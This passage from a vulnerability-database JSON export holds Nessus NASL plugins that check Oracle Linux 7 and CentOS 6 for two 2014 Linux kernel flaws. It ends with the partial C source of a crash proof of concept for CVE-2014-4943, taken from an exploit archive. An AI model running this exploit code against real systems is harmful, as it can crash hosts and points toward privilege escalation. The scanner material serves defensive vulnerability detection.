reference:\"kernel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-123.4.4.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-21T08:20:15", "references": ["https://oss.oracle.com/pipermail/el-errata/2014-July/004295.html"], "pluginID": "76746", "description": "From Red Hat Security Advisory 2014:0923 :\n\nUpdated kernel packages that fix two security issues are now available for Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 3, "reporter": "Tenable", "published": "2014-07-24T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2014-0923)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2014-0923.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0923 and \n# Oracle Linux Security Advisory ELSA-2014-0923 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76746);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_bugtraq_id(68411, 68683);\n script_xref(name:\"RHSA\", value:\"2014:0923\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2014-0923)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0923 :\n\nUpdated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting\nCVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004295.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.4.4.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.4.4.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-03T10:21:22", "references": ["http://www.nessus.org/u?6bd5ef0f"], "pluginID": "76838", "description": "Updated kernel packages that fix two security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 3, "reporter": "Tenable", "published": "2014-07-26T00:00:00", "title": "CentOS 6 : kernel (CESA-2014:0924)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-07-02T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2014-0924.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0924 and \n# CentOS Errata and Security Advisory 2014:0924 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76838);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_bugtraq_id(68411, 68683);\n script_xref(name:\"RHSA\", value:\"2014:0924\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2014:0924)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting\nCVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2014-July/020444.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6bd5ef0f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-431.20.5.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-10T00:26:57", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 2, "reporter": "Emeric Nasi", "published": "2015-03-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4943"], "modified": "2015-03-05T00:00:00", "id": "1337DAY-ID-23356", "href": "https://0day.today/exploit/description/23356", "sourceData": "/* ----------------------------------------------------------------------------------------------------\r\n * cve-2014-4943_poc.c\r\n *\r\n * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure\r\n * differences between an l2tp socket and an inet socket.\r\n *\r\n * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.\r\n * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.\r\n * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.\r\n * If seems guys at immunuty found a way using race condition.\r\n *\r\n *\r\n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c \r\n *\r\n * Emeric Nasi - www.sevagas.com\r\n *-----------------------------------------------------------------------------------------------------*/\r\n \r\n \r\n \r\n/* ----------------------- Includes ----------------------------*/\r\n \r\n#include <netinet/ip.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <linux/net.h>\r\n#include <linux/udp.h>\r\n#include <linux/if.h>\r\n#include <linux/if_pppox.h>\r\n#include <linux/if_pppol2tp.h>\r\n \r\n \r\n/* ----------------------- Definitions ----------------------------*/\r\n \r\n#define TARGET_KERNEL_MIN \"3.2.0\"\r\n#define TARGET_KERNEL_MAX \"3.15.6\"\r\n#define EXPLOIT_NAME \"cve-2014-4943\"\r\n \r\n \r\n \r\n/* ----------------------- functions ----------------------------*/\r\n \r\n \r\n/**\r\n * It is possible to modify several parts of socket object using IP options frop UDP setsockopt\r\n * For this POC, IP_OPTIONS is the easiest way to panic kernel\r\n */\r\nvoid modifyUDPvalues(int tunnel_fd)\r\n{\r\n/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:\r\n \r\n int udp_setsockopt(struct sock *sk, int level, int optname,\r\n char __user *optval, unsigned int optlen)\r\n {\r\n if (level == SOL_UDP || level == SOL_UDPLITE)\r\n return udp_lib_setsockopt(sk, level, optname, optval, optlen,\r\n udp_push_pending_frames);\r\n return ip_setsockopt(sk, level, optname, optval, optlen);\r\n }\r\n*/\r\n \r\n int ip_options = 0x1;\r\n \r\n if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1)\r\n {\r\n perror(\"setsockopt (IP_OPTIONS)\"); \r\n }\r\n}\r\n \r\n \r\n/**\r\n * DOS poc for cve_2014_4943 vulnerability\r\n */\r\nint main()\r\n{\r\n \r\n int tunnel_fd;\r\n int tunnel_fd2;\r\n int udp_fd;\r\n \r\n printf(\"[cve_2014_4943]: Preparing to exploit.\\n\");\r\n \r\n /* Create first L2TP socket */\r\n tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);\r\n if (tunnel_fd < 0)\r\n {\r\n perror(\"socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)\");\r\n return -1;\r\n }\r\n /* Create second L2TP socket */\r\n tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);\r\n if (tunnel_fd2 < 0)\r\n {\r\n perror(\"socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)\");\r\n return -1;\r\n }\r\n if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)\r\n {\r\n perror(\"cannot create socket\");\r\n return -1;\r\n }\r\n \r\n /* Connect LT2P socket */\r\n struct sockaddr_pppol2tp sax;\r\n \r\n memset(&sax, 0, sizeof(sax));\r\n sax.sa_family = AF_PPPOX;\r\n sax.sa_protocol = PX_PROTO_OL2TP;\r\n sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */\r\n sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;\r\n sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;\r\n 